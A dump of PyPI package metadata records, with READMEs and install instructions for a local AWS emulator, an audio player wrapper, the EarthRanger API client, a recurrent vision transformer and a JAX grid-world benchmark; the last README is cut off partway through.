execution): ```bash # Linux — use --network=host so all service ports are reachable docker run --rm \ -v $(pwd):/workspace \ -v /var/run/docker.sock:/var/run/docker.sock \ --network=host \ ghcr.io/local-web-services/local-web-services:latest # Mac / Windows — publish the port range explicitly docker run --rm \ -v $(pwd):/workspace \ -v /var/run/docker.sock:/var/run/docker.sock \ -p 3000-3025:3000-3025 \ ghcr.io/local-web-services/local-web-services:latest ``` Persist state across container restarts with a named volume: ```bash docker run --rm \ -v $(pwd)/cdk.out:/workspace/cdk.out \ -v lws-state:/workspace/.ldk \ -v /var/run/docker.sock:/var/run/docker.sock \ --network=host \ ghcr.io/local-web-services/local-web-services:latest ``` > **Note:** The image expects a pre-synthesised `cdk.out/` directory (run `npx cdk synth` first) or a Terraform project. Node.js and the CDK CLI are not included in the image. ### pip / uv local-web-services requires Python 3.11+, [uv](https://docs.astral.sh/uv/), and [Docker](https://docs.docker.com/get-docker/). ```bash uvx --from local-web-services ldk ``` Or install from source: ```bash git clone https://github.com/local-web-services/local-web-services.git cd local-web-services uv sync ``` ### Lambda Runtime Images Lambda functions run inside official AWS Lambda Docker images which include the AWS SDK pre-installed (`boto3` for Python, `@aws-sdk/*` for Node.js). Pull them once before first use: ```bash # Pull all supported Lambda runtime images uvx --from local-web-services ldk setup lambda # Or pull a specific runtime only uvx --from local-web-services ldk setup lambda --runtime python3.12 ``` ## Quick Start (Your Own Project) ### CDK Projects 1. Make sure your CDK project has been synthesized: ```bash cd your-cdk-project npx cdk synth ``` 2. Pull the Lambda runtime images (one-time setup): ```bash uvx --from local-web-services ldk setup lambda ``` 3. Start local-web-services: ```bash uvx --from local-web-services ldk dev --project-dir /path/to/your-cdk-project --port 3000 ``` `ldk` will discover your API routes, Lambda functions, DynamoDB tables, SQS queues, SNS topics, S3 buckets, Step Functions state machines, SSM parameters, and Secrets Manager secrets automatically from the CDK output. ### Terraform Projects 1. Initialize your Terraform project: ```bash cd your-terraform-project terraform init ``` 2. Pull the Lambda runtime images (one-time setup): ```bash uvx --from local-web-services ldk setup lambda ``` 3. Start local-web-services: ```bash uvx --from local-web-services ldk dev --project-dir /path/to/your-terraform-project ``` `ldk` auto-detects `.tf` files and starts all service providers in always-on mode. A `_lws_override.tf` file is generated to redirect the AWS provider to local endpoints. 4. Apply your Terraform configuration: ```bash terraform apply ``` Terraform creates resources (tables, queues, buckets, Lambda functions, API routes) against your local services. No AWS account needed. ### Mode Selection `ldk dev` auto-detects your project type. To force a specific mode: ```bash uvx --from local-web-services ldk dev --mode cdk # Force CDK mode uvx --from local-web-services ldk dev --mode terraform # Force Terraform mode ``` ## Supported Services Each service has two dimensions of support: **IaC constructs** parsed from your project, and **API operations** emulated at runtime. ### DynamoDB **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_dynamodb.Table` | tableName, partitionKey, sortKey, globalSecondaryIndexes | **API Operations:** | Operation | Supported | |-----------|-----------| | PutItem | Yes | | GetItem | Yes | | DeleteItem | Yes | | UpdateItem | Yes | | Query | Yes | | Scan | Yes | | BatchGetItem | Yes | | BatchWriteItem | Yes | | CreateTable | Yes | | DeleteTable | Yes | | DescribeTable | Yes | | ListTables | Yes | | TransactGetItems | Yes | | TransactWriteItems | Yes | | UpdateTable | Yes | | DescribeContinuousBackups | Yes | | UpdateTimeToLive | Yes | Backed by SQLite. Supports expression attribute names/values, filter expressions, and eventual consistency simulation. ### SQS **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_sqs.Queue` | queueName, fifo, visibilityTimeout, contentBasedDeduplication, deadLetterQueue | **API Operations:** | Operation | Supported | |-----------|-----------| | SendMessage | Yes | | ReceiveMessage | Yes | | DeleteMessage | Yes | | CreateQueue | Yes | | DeleteQueue | Yes | | GetQueueUrl | Yes | | GetQueueAttributes | Yes | | SetQueueAttributes | Yes | | ListQueues | Yes | | PurgeQueue | Yes | | SendMessageBatch | Yes | | DeleteMessageBatch | Yes | | ChangeMessageVisibility | Yes | | ChangeMessageVisibilityBatch | Yes | | ListDeadLetterSourceQueues | Yes | Supports message attributes, long polling, and dead-letter queue wiring from RedrivePolicy. ### S3 **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_s3.Bucket` | bucketName | **API Operations:** | Operation | Supported | |-----------|-----------| | PutObject | Yes | | GetObject | Yes | | DeleteObject | Yes | | HeadObject | Yes | | ListObjectsV2 | Yes | | CreateBucket | Yes | | DeleteBucket | Yes | | HeadBucket | Yes | | ListBuckets | Yes | | CopyObject | Yes | | DeleteObjects | Yes | | PutBucketTagging | Yes | | GetBucketTagging | Yes | | DeleteBucketTagging | Yes | | GetBucketLocation | Yes | | PutBucketPolicy | Yes | | GetBucketPolicy | Yes | | PutBucketNotificationConfiguration | Yes | | GetBucketNotificationConfiguration | Yes | | CreateMultipartUpload | No | Backed by the local filesystem. Supports event notifications (ObjectCreated, ObjectRemoved), presigned URL generation, ETags, and content-type headers. ### SNS **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_sns.Topic` | topicName | `aws_sns.Subscription` is not parsed. Subscriptions are wired at runtime via the API or auto-wired by local-web-services for Lambda/SQS targets. **API Operations:** | Operation | Supported | |-----------|-----------| | Publish | Yes | | Subscribe | Yes | | CreateTopic | Yes | | ListTopics | Yes | | ListSubscriptions | Yes | | DeleteTopic | Yes | | SetTopicAttributes | Yes | | Unsubscribe | Yes | | GetSubscriptionAttributes | Yes | | SetSubscriptionAttributes | Yes | | ConfirmSubscription | Yes | | ListSubscriptionsByTopic | Yes | Supports Lambda and SQS subscription protocols, message attributes, and fan-out to multiple subscribers. ### EventBridge **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_events.EventBus` | eventBusName | | `aws_events.Rule` | ruleName, eventBus, eventPattern, schedule, targets | **API Operations:** | Operation | Supported | |-----------|-----------| | PutEvents | Yes | | PutRule | Yes | | PutTargets | Yes | | ListRules | Yes | | ListEventBuses | Yes | | RemoveTargets | Yes | | DeleteRule | Yes | | DescribeRule | Yes | | ListTargetsByRule | Yes | | EnableRule | Yes | | DisableRule | Yes | | TagResource | Yes | | UntagResource | Yes | | ListTagsForResource | Yes | Supports event pattern matching, schedule expressions (rate and cron), Lambda targets, and input transformations. ### Step Functions **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_stepfunctions.StateMachine` | stateMachineName, definitionBody, stateMachineType | **API Operations:** | Operation | Supported | |-----------|-----------| | StartExecution | Yes | | StartSyncExecution | Yes | | DescribeExecution | Yes | | ListExecutions | Yes | | ListStateMachines | Yes | | CreateStateMachine | Yes | | StopExecution | Yes | | GetExecutionHistory | Yes | | UpdateStateMachine | Yes | State types: Task, Pass, Choice, Wait, Succeed, Fail, Parallel, Map. Supports JSONPath (InputPath, OutputPath, ResultPath), error handling (Retry, Catch), and Standard & Express workflows. ### Cognito **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_cognito.UserPool` | userPoolName, lambdaTriggers (preAuthentication, postConfirmation), passwordPolicy | | `aws_cognito.UserPoolClient` | userPool | **API Operations:** | Operation | Supported | |-----------|-----------| | SignUp | Yes | | ConfirmSignUp | Yes | | InitiateAuth | Yes (USER_PASSWORD_AUTH) | | JWKS endpoint | Yes | | CreateUserPoolClient | Yes | | DeleteUserPoolClient | Yes | | DescribeUserPoolClient | Yes | | ListUserPoolClients | Yes | | AdminCreateUser | Yes | | AdminDeleteUser | Yes | | AdminGetUser | Yes | | UpdateUserPool | Yes | | ListUsers | Yes | | ForgotPassword | No | | ChangePassword | No | | GlobalSignOut | No | Backed by SQLite. Supports JWT token generation (ID, access, refresh), user attributes, and password hashing. ### Lambda **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_lambda.Function` | handler, runtime, code, timeout, memorySize, environment | **Management API (Terraform mode):** | Operation | Supported | |-----------|-----------| | CreateFunction | Yes | | GetFunction | Yes | | DeleteFunction | Yes | | ListFunctions | Yes | | Invoke | Yes | | UpdateFunctionConfiguration | Yes | | UpdateFunctionCode | Yes | | TagResource | Yes | | UntagResource | Yes | | ListEventSourceMappings | Yes | Runs functions inside official AWS Lambda Docker images (with AWS SDK pre-installed). Run `ldk setup lambda` once to pull the images. Supports timeout enforcement, realistic context objects, and environment variable injection. In CDK mode, functions are discovered from the cloud assembly. In Terraform mode, functions are created dynamically via the management API. ### API Gateway **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_apigateway.RestApi` | routes, methods, integrations | | `aws_apigatewayv2.HttpApi` | routes, integrations | **REST API (V1) Management:** CreateRestApi, GetRestApi, DeleteRestApi, CreateResource, PutMethod, PutIntegration, CreateDeployment, CreateStage. **HTTP API (V2) Management:** CreateApi, GetApi, DeleteApi, CreateRoute, CreateIntegration, CreateStage, ListRoutes, ListIntegrations, ListStages. Supports both REST API (V1) and HTTP API (V2) with Lambda proxy integration. Routes requests to local Lambda functions with path parameters, query parameters, and request/response mapping. ### ECS **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_ecs.TaskDefinition` | containerDefinitions | | `aws_ecs.FargateService` / `aws_ecs.Ec2Service` | taskDefinition | | `aws_elasticloadbalancingv2.ApplicationListenerRule` | conditions, actions | Runs services as local subprocesses. Supports health checking, service discovery, file watching with auto-restart, and port mapping. Supports local command overrides via `ldk.local_command` metadata. CDK mode only. ### IAM & STS Stub APIs that return AWS-compatible responses for Terraform compatibility. IAM role and policy operations are accepted and stored in memory (CreateRole, GetRole, DeleteRole, CreatePolicy, GetPolicy, DeletePolicy, AttachRolePolicy, DetachRolePolicy, CreatePolicyVersion, ListRoles, ListPolicies). STS returns dummy credentials and caller identity (GetCallerIdentity, AssumeRole). ### SSM Parameter Store **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_ssm.StringParameter` | Name, Type, Value, Description | **API Operations:** | Operation | Supported | |-----------|-----------| | PutParameter | Yes | | GetParameter | Yes | | GetParameters | Yes | | GetParametersByPath | Yes | | DeleteParameter | Yes | | DeleteParameters | Yes | | DescribeParameters | Yes | | AddTagsToResource | Yes | | RemoveTagsFromResource | Yes | | ListTagsForResource | Yes | In-memory parameter store supporting String, StringList, and SecureString types. Supports versioning (auto-incremented on overwrite), descriptions, and tags. In CDK mode, parameters defined in the CloudFormation template are pre-seeded on startup. ### Secrets Manager **CDK Constructs:** | Construct | Parsed Properties | |-----------|-------------------| | `aws_secretsmanager.Secret` | Name, Description, SecretString, GenerateSecretString | **API Operations:** | Operation | Supported | |-----------|-----------| | CreateSecret | Yes | | GetSecretValue | Yes | | PutSecretValue | Yes | | UpdateSecret | Yes | | DeleteSecret | Yes | | DescribeSecret | Yes | | ListSecrets | Yes | | RestoreSecret | Yes | | TagResource | Yes | | UntagResource | Yes | | ListSecretVersionIds | Yes | In-memory secret store supporting version staging (AWSCURRENT/AWSPREVIOUS), soft delete with optional recovery, and tags. In CDK mode, secrets defined in the CloudFormation template are pre-seeded on startup. ## IAM Authorization Test IAM authorization locally by configuring identities, permissions, and enforcement modes per service. When IAM auth is enabled, every request is evaluated against identity policies before reaching the service handler. ```bash # Check current IAM auth configuration uvx --from local-web-services lws iam-auth status # Enable enforce mode for a service (requests without permission are denied) uvx --from local-web-services lws iam-auth enable dynamodb # Enable audit mode (requests pass through but violations are logged) uvx --from local-web-services lws iam-auth set dynamodb --mode audit # Disable IAM auth for a service uvx --from local-web-services lws iam-auth disable dynamodb # Switch the active identity (useful for testing different roles) uvx --from local-web-services lws iam-auth set-identity readonly-role ``` Identities and permissions are defined in YAML files under `.lws/iam/`: - **`.lws/iam/identities.yaml`** — named identities with inline policies and optional boundary policies - **`.lws/iam/permissions.yaml`** — maps service operations to required IAM actions (merged on top of built-in defaults) - **`.lws/iam/resource_policies.yaml`** — per-resource policies (e.g., bucket policies for S3) Configure IAM auth globally or per-service in `ldk.yaml`: ```yaml iam_auth: mode: enforce # enforce | audit | disabled (default: disabled) default_identity: admin-user services: dynamodb: mode: enforce s3: mode: audit ``` Supported services: dynamodb, sqs, s3, sns, events, stepfunctions, cognito-idp, ssm, secretsmanager. IAM and STS are excluded from auth middleware to avoid bootstrap issues. ## Agent Setup If you use a coding agent (Claude Code, etc.), run `lws init` to scaffold agent configuration into your project: ```bash uvx --from local-web-services lws init --project-dir /path/to/your-project ``` This creates: - **CLAUDE.md** snippet with lws quick reference and common commands - **Custom slash commands** (`/lws:mock`, `/lws:chaos`, and `/lws:iam-auth`) that guide your agent through mock, chaos, and IAM auth workflows ## AWS Operation Mocking Mock specific AWS operations to return canned responses during local development. This lets you control exactly what your Lambda functions or application receives — useful for testing error handling, edge cases, or complex multi-service flows. ```bash # Create a persistent mock definition uvx --from local-web-services lws aws-mock create my-s3-mock --service s3 # Add an operation rule (returns custom response for get-object) uvx --from local-web-services lws aws-mock add-operation my-s3-mock \ --operation get-object --body-string "mocked file content" # Or configure at runtime (requires ldk dev running) uvx --from local-web-services lws aws-mock set-rules dynamodb \ --operation get-item --status 200 --body '{"Item": {"id": {"S": "mock-123"}}}' # Check mock status uvx --from local-web-services lws aws-mock status ``` Supported services: dynamodb, sqs, s3, sns, events, stepfunctions, cognito-idp, ssm, secretsmanager. Supports header-based filtering to mock only specific request patterns. ## Chaos Engineering Inject failures into AWS service calls to test application resilience: ```bash # Enable chaos for DynamoDB with 50% error rate uvx --from local-web-services lws chaos enable dynamodb uvx --from local-web-services lws chaos set dynamodb --error-rate 0.5 # Add latency to S3 calls uvx --from local-web-services lws chaos enable s3 uvx --from local-web-services lws chaos set s3 --latency-min 200 --latency-max 500 # Check chaos status uvx --from local-web-services lws chaos status # Disable when done uvx --from local-web-services lws chaos disable dynamodb ``` Chaos parameters: `--error-rate`, `--latency-min`, `--latency-max`, `--timeout-rate`, `--connection-reset-rate`. ## Development All development tasks are available through `make`: ```bash make install # Install dependencies make test # Run test suite make lint # Run linter make format # Auto-format code make check # Run all checks (lint, format, complexity, tests) ``` Run `make` with no arguments to see all available targets. ## Documentation Visit [https://local-web-services.github.io/www/](https://local-web-services.github.io/www/) for full documentation. ## Contributing See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines on how to contribute. ## License This project is licensed under the MIT License. See [LICENSE](LICENSE) for details.
text/markdown
null
null
null
null
null
agentic, ai, aws, cdk, code-editor, development, dynamodb, lambda, local, s3, secretsmanager, sns, sqs, ssm, vibe-coding
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Topic :: Software Develop...
[]
null
null
>=3.11
[]
[]
[]
[ "aiosqlite>=0.20.0", "croniter>=2.0.0", "docker>=7.0.0", "fastapi>=0.110.0", "httpx>=0.27.0", "pyjwt[crypto]>=2.8.0", "python-multipart>=0.0.9", "pyyaml>=6.0", "rich>=13.0.0", "typer>=0.9.0", "uvicorn[standard]>=0.27.0", "watchdog>=4.0.0", "allure-pytest-bdd>=2.13.0; extra == \"dev\"", "bl...
[]
[]
[]
[ "Homepage, https://local-web-services.github.io/www", "Repository, https://github.com/local-web-services/local-web-services", "Issues, https://github.com/local-web-services/local-web-services/issues" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:05:04.523822
local_web_services-0.17.2.tar.gz
906,455
ad/76/f0ca8271c66a49f4074d7f099bd38fa45cb3204b9eb6082fd7e19e45220f/local_web_services-0.17.2.tar.gz
source
sdist
null
false
ad23ee65b09b00e88724578a8ee624fc
1da36c35c5d4694112c6d355825e327c539c5c34bc5b927f0bbec6e31b074229
ad76f0ca8271c66a49f4074d7f099bd38fa45cb3204b9eb6082fd7e19e45220f
MIT
[ "LICENSE" ]
253
2.4
audio-workbench
0.1.0
Python wrapper for Audio Workbench Player (HTML/Streamlit embedding)
# audio-workbench (Python wrapper) Python helper package to embed `audio-workbench` in Streamlit, Jupyter, and other HTML-capable UIs. ## Install (PyPI) ```bash pip install audio-workbench ``` Optional demo dependencies: ```bash pip install "audio-workbench[streamlit]" pip install "audio-workbench[gradio]" ``` ## Install (local dev) ```bash pip install -e . ``` ## Usage ```python from audio_workbench import render_daw_player html = render_daw_player( audio_bytes, iframe_height=320, viewMode="spectrogram", transportStyle="hero", transportOverlay=True, showOverview=False, showFileOpen=False, showStatusbar=False, ) ``` ## Demo Features - Presets: `Full DAW`, `Compact`, `Preview Waveform Hero`, `Preview Spectrogram Hero`, `Ultra Compact Hero` - Advanced toggles for all relevant player sections - Live options preview as JSON ## Streamlit demo ```bash streamlit run demo_streamlit.py ``` ## Gradio demo ```bash pip install gradio python demo_gradio.py ``` ## License GNU AGPL-3.0
text/markdown
Perch Contributors
null
null
null
null
audio, player, streamlit, jupyter, embed, waveform, spectrogram
[ "Development Status :: 4 - Beta", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Operating System :: OS Independent" ]
[]
null
null
>=3.9
[]
[]
[]
[ "streamlit>=1.30; extra == \"streamlit\"", "gradio>=4.0; extra == \"gradio\"" ]
[]
[]
[]
[ "Homepage, https://github.com/LimitlessGreen/Audio-Workbench", "Repository, https://github.com/LimitlessGreen/Audio-Workbench", "Issues, https://github.com/LimitlessGreen/Audio-Workbench/issues" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T22:04:50.688004
audio_workbench-0.1.0.tar.gz
70,126
f3/22/e227252e7b439d8da4f09b4a88627d648947301a352188e00b8adb9e08e1/audio_workbench-0.1.0.tar.gz
source
sdist
null
false
5ed140e70b49beb425e662f732e4f602
f0083d097d9582f96e833843eb37a037f6b0f17195c316555436931cfe5eece2
f322e227252e7b439d8da4f09b4a88627d648947301a352188e00b8adb9e08e1
AGPL-3.0-only
[ "LICENSE" ]
214
2.4
earthranger-client
1.13.0
Client for EarthRanger API
# EarthRanger Client ## Introduction [EarthRanger](https://www.earthranger.com/) is a software solution that helps protected area managers, ecologists, and wildlife biologists make informed operational decisions for wildlife conservation. The earthranger-client (er-client) is a Python library for accessing the EarthRanger HTTP API. It simplifies interaction with the API by abstracting away the complexity of resource-based endpoints and provides multi-threaded and async capabilities for improved performance. ## Uses of er-client * Extracting data for analysis * Importing ecological or other historical data * Integrating a new field sensor type. If you do and will be supporting multiple ER sites, contact us to talk about our Gundi integrations platform * Performing external analysis that results in publishing an Alert on the ER platform. ## Quick Start see simple-example.py ## Installation From pypi ``` pip install earthranger-client ``` ## Usage In your code, import the library and create an instance of the client. You must provide `client_id` (e.g. `example_client_id`) for username/password authentication. ``` from erclient import ERClient client = ERClient(service_root="https://sandbox.pamdas.org", client_id="example_client_id", username="", password="") ``` ## Async Support We also offer an async client (asyncio). Disclaimer: The async client current capabilities are limited to: * Posting Sensor Observations (a.k.a Positions) * Posting Events (a.k.a Reports) * Posting Event Attachments * Posting Camera Trap Reports * Getting Event Types * Getting Events * Getting Observations * Getting Subject Groups * Getting Feature groups * Getting Sources * Getting Source Assignments (aka SubjectSource resources) ``` from erclient import AsyncERClient # You can use it as an async context-managed client async with AsyncERClient(service_root="https://sandbox.pamdas.org", client_id="example_client_id", username="", password="") as client: await self.er_client.post_sensor_observation(position) await client.post_report(report) await self.er_client.post_camera_trap_report(camera_trap_payload, file) ... async with AsyncERClient(service_root="https://sandbox.pamdas.org", client_id="example_client_id", username="", password="") as client: async for observation in client.get_observations(start="2023-11-10T00:00:00-06:00"): print(observation) ... # Or create an instance and close the client explicitly later client = AsyncERClient(service_root="https://sandbox.pamdas.org", client_id="example_client_id", username="", password="") await self.er_client.post_sensor_observation(position) await client.post_report(report) await self.er_client.post_camera_trap_report(camera_trap_payload, file) ... await client.close() # Close the session used to send requests to ER API ```
text/markdown
null
EarthRanger <opensource@earthranger.com>
null
null
Apache-2.0
EarthRanger, api
[ "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", ...
[]
null
null
>=3.8
[]
[]
[]
[ "dateparser>=1.1.1", "gpxpy>=1.5.0", "httpx>=0.23.3", "importlib-metadata; python_version < \"3.8\"", "pydantic>=1.10.17", "pytz>=2021.1", "requests>=2.28.0", "anyio; extra == \"test\"", "pytest-asyncio; extra == \"test\"", "pytest-mock; extra == \"test\"", "pytest>=8; extra == \"test\"", "res...
[]
[]
[]
[ "Homepage, http://github.com/PADAS/er-client" ]
uv/0.8.15
2026-02-19T22:04:50.358760
earthranger_client-1.13.0.tar.gz
318,454
2f/e0/6ee4bd8712fdb88e87679ce386e7996c497690ad07678e6c730cb9e97035/earthranger_client-1.13.0.tar.gz
source
sdist
null
false
48af64277f01be091cbc92213b8713ce
1b3085cdd9802a8eabea3f953d51bee42ffc5c7df04bd688a71d7b8400cabdab
2fe06ee4bd8712fdb88e87679ce386e7996c497690ad07678e6c730cb9e97035
null
[ "LICENSE" ]
262
2.4
nifigen
2.2.0
nifigen
# WhatsApp Utils A Python package for handling WhatsApp audio messages with Azure AI services integration. ## Features - Send and receive WhatsApp audio messages - Speech-to-text conversion using Azure Cognitive Services - Text-to-speech conversion using Azure Cognitive Services - AI-powered responses using Azure OpenAI ## Installation ```bash python -m build pip install whatsapp_utilsFAPI
text/markdown
nifigen
null
null
null
MIT
null
[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent" ]
[]
null
null
>=3.11
[]
[]
[]
[]
[]
[]
[]
[]
twine/6.2.0 CPython/3.12.10
2026-02-19T22:04:05.935771
nifigen-2.2.0-py3-none-any.whl
57,348
5f/a6/8bd7e5d6c45284a04d4a0da6cd695f445197e23cbd64812729c231cd0e4e/nifigen-2.2.0-py3-none-any.whl
py3
bdist_wheel
null
false
c59fc9e4223c4db4e5af62f703ab2d58
7cb8105e742a33aee51ed4c2398e7ebb2580573e229f87922b14f14d21269338
5fa68bd7e5d6c45284a04d4a0da6cd695f445197e23cbd64812729c231cd0e4e
null
[ "LICENSE" ]
93
2.4
canvit-pytorch
0.1.3
CanViT (Canvas Vision Transformer) -- PyTorch
# CanViT (Canvas Vision Transformer) -- PyTorch <p align="center"> <img src="assets/canvas_attention_across_scales.png" alt="Canvas attention across scales — two example trajectories showing glimpses, canvas crops, and full canvas PCA/change maps over multiple timesteps." width="100%"> </p> **Yohaï-Eliel Berreby, Sabrina Du, Audrey Durand, Suresh Krishna** Reference PyTorch implementation of CanViT (Canvas Vision Transformer). _This is an early release. For details, a preprint version of our manuscript "CanViT: Toward Active Vision Foundation Models" will be available in the coming weeks._ --- CanViT is a scalable recurrent architecture for fine-grained vision, and the first **Active Vision Foundation Model (AVFM)**: a foundation model for active vision that is both task-agnostic and policy-agnostic. CanViT processes scenes through sequences of localized glimpses, integrating observations over time into a persistent scene-wide latent workspace — the **canvas** — via **Canvas Attention**, an efficient asymmetric cross-attention mechanism which is based on Scene-Relative Rotary Position Embeddings and eliminates canvas-side QKVO projections. CanViT-B is pretrained on 1 billion glimpses taken from 13.5 million ImageNet-21k scenes, via **policy-agnostic passive-to-active dense distillation** from a frozen high-resolution DINOv3 ViT-B teacher, without human annotations. CanViT's scene-wide output features at each timestep are linearly decodable into dense predictions without post-hoc upscaling; a frozen-weights CanViT-B evaluated with linear probing outperforms all prior dense active vision models by a wide margin on ADE20K scene parsing, at a fraction of the cost, while offering significantly greater flexibility. CanViT generalizes natively across policies, sequence length, glimpse size and canvas size, enabling high-resolution and long-horizon continual pretraining alongside task-specific policy learning. CanViT enables low-latency high-resolution dense vision, running at hundreds of sequential frames per second on commodity hardware. ## Quickstart We recommend [`uv`](https://docs.astral.sh/uv/) for dependency management. ```bash uv add canvit-pytorch ``` ```python from canvit_pytorch import CanViTForPretrainingHFHub, Viewpoint, sample_at_viewpoint from canvit_pytorch.preprocess import preprocess from PIL import Image import torch # CanViT is integrated with the HuggingFace Hub. model = CanViTForPretrainingHFHub.from_pretrained( "canvit/canvitb16-add-vpe-pretrain-g128px-s512px-in21k-dv3b16-2026-02-02" ).eval() # Replace with the image of your choice image = Image.open("test_data/Cat03.jpg").convert("RGB") image = preprocess(512)(image) image = image.unsqueeze(0) # [1, 3, 512, 512] # CanViT is a recurrent model. state = model.init_state(batch_size=1, canvas_grid_size=32) # Let's process a first glimpse: centered, zoomed-out. # You can use any viewpoint you like, as long as it is within bounds. # CanViT was trained on viewpoints covering 0.25% to 100% # of a scene's surface area. with torch.inference_mode(): vp = Viewpoint.full_scene(batch_size=1, device=image.device) glimpse = sample_at_viewpoint(spatial=image, viewpoint=vp, glimpse_size_px=128) out = model(glimpse=glimpse, state=state, viewpoint=vp) # Let's inspect the structure of what we get back. # The canvas contains the model's working understanding of # the scene at any given time, and is linearly decodable # into dense predictions upon token-wise LayerNorm. # See `demos/basic.py` for how to visualize the canvas. canvas_spatial = model.get_spatial(out.state.canvas) # [1, 1024, 1024] canvas_spatial = canvas_spatial.unflatten(1, (32, 32)) # [1, 32, 32, 1024] — spatial feature map out.state.recurrent_cls # [1, 1, 768] — global CLS token out.local_patches # [1, 64, 768] — glimpse patch features # Now let's do a second glimpse: zoom into the top-left quadrant # You can do this repeatedly: CanViT is recurrent with a large but constant-size canvas. with torch.inference_mode(): vp2 = Viewpoint(centers=torch.tensor([[-.5, -.5]]), scales=torch.tensor([.5])) glimpse2 = sample_at_viewpoint(spatial=image, viewpoint=vp2, glimpse_size_px=128) out2 = model(glimpse=glimpse2, state=out.state, viewpoint=vp2) # You can use CanViT with frozen weights, fine-tune it, learn a policy on top... # Or pretrain your own; it's fast. # Start building! ``` For a full demo with classification and PCA visualization: ```bash git clone https://github.com/m2b3/CanViT-PyTorch.git cd CanViT-PyTorch uv run --extra demo python demos/basic.py ``` ## Pretrained checkpoints We release checkpoints on HuggingFace under the [`canvit`](https://huggingface.co/canvit) namespace. The following checkpoints are currently available: - [`canvit/canvitb16-add-vpe-pretrain-g128px-s512px-in21k-dv3b16-2026-02-02`](https://huggingface.co/canvit/canvitb16-add-vpe-pretrain-g128px-s512px-in21k-dv3b16-2026-02-02) ## Citation If you use this work, please cite this repository. An updated citation will be available upon preprint release. ```bibtex @misc{berreby2026canvit, title={CanViT: Toward Active Vision Foundation Models}, author={Berreby, Yoha{\"i}-Eliel and Du, Sabrina and Durand, Audrey and Krishna, Suresh}, year={2026}, howpublished={\url{https://github.com/m2b3/CanViT-PyTorch}} } ``` ## Contact Open an issue in this repository or email me@yberreby.com. ## License MIT. See [LICENSE.md](LICENSE.md) for details.
text/markdown
null
Yohaï-Eliel Berreby <me@yberreby.com>
null
null
null
null
[]
[]
null
null
>=3.12
[]
[]
[]
[ "huggingface-hub>=1.3.2", "numpy<2.4.0,>=2.2.0", "safetensors>=0.7.0", "torch>=2.9.1", "torchvision>=0.22.1", "dinov3-in1k-probes; extra == \"demo\"", "matplotlib>=3.10.8; extra == \"demo\"", "scikit-learn>=1.7.0; extra == \"demo\"", "timm>=1.0.0; extra == \"demo\"", "tyro>=1.0.3; extra == \"demo\...
[]
[]
[]
[]
uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true}
2026-02-19T22:03:10.769467
canvit_pytorch-0.1.3.tar.gz
95,960
89/ba/6dd1df3a8ca56bfa55f1908d848f91e2814f6c966a340a241611bf8a4da5/canvit_pytorch-0.1.3.tar.gz
source
sdist
null
false
653a86c04a4aafce5cf5d54b233f683a
5738c4691842d1cb308f8289a4ebc93276d9df99517e6ee2e4ab429b21393755
89ba6dd1df3a8ca56bfa55f1908d848f91e2814f6c966a340a241611bf8a4da5
MIT
[ "LICENSE.md" ]
209
2.4
continual-foragax
0.49.0
A continual reinforcement learning benchmark
# foragax Foragax is a lightweight, JAX-first grid-world environment suite for continual / procedural experiments. It provides a small collection of environment variants (weather, multi-biome, etc.), a registry factory for easy construction, and simple example scripts for plotting and visualization. This version is a [Gymnax](https://github.com/RobertTLange/gymnax) environment implemented in JAX. The original implementation of Forager is implemented in Numba is available at [andnp/forager](https://github.com/andnp/forager). In addition to the original features, this implementation includes: biomes, visualization, and a weather environment. Key ideas: - Functional, JAX-friendly API (explicit PRNG keys, immutable env state objects). - Multiple observation modalities: Object and RGB, as well as aperture based or full-world observations. - Customizable biomes - Customizable object placement, respawning, and rewards. - Visualization via RGB rendering and plotting. ## Quickstart We recommend installing with pip from https://pypi.org/project/continual-foragax/. ```bash pip install continual-foragax ``` We support Python 3.8 through Python 3.13. The codebase expects JAX and other numeric dependencies. If you don't have JAX installed, see the JAX install instructions for your platform; the project `uv.lock` pins compatible versions. ## Minimal example (from examples) Use the registry factory to create an environment and run it with JAX-style RNG keys and an explicit environment state. ```python from foragax.registry import make import jax # create env (observation_type is one of: 'object', 'rgb', 'world') env = make( "ForagaxWeather-v1", aperture_size=5, observation_type="object", ) # environment parameters and RNG env_params = env.default_params key = jax.random.key(0) key, key_reset = jax.random.split(key) # reset returns (obs, env_state) _, env_state = env.reset(key_reset, env_params) # sampling an action and stepping (functional-style) key, key_act, key_step = jax.random.split(key, 3) action = env.action_space(env_params).sample(key_act) _, next_env_state, reward, done, info = env.step(key_step, env_state, action, env_params) # rendering supports multiple modes: 'world' and 'aperture' frame = env.render(env_state, env_params, render_mode="aperture") ``` See `examples/plot.py` and `examples/visualize.py` for runnable scripts that produce a sample plot and saved videos using Gym/Gymnasium helpers. ## Registry and included environments Use `foragax.registry.make` to construct environments by id. Example environment ids include: - `ForagaxTwoBiomeSmall-v1` / 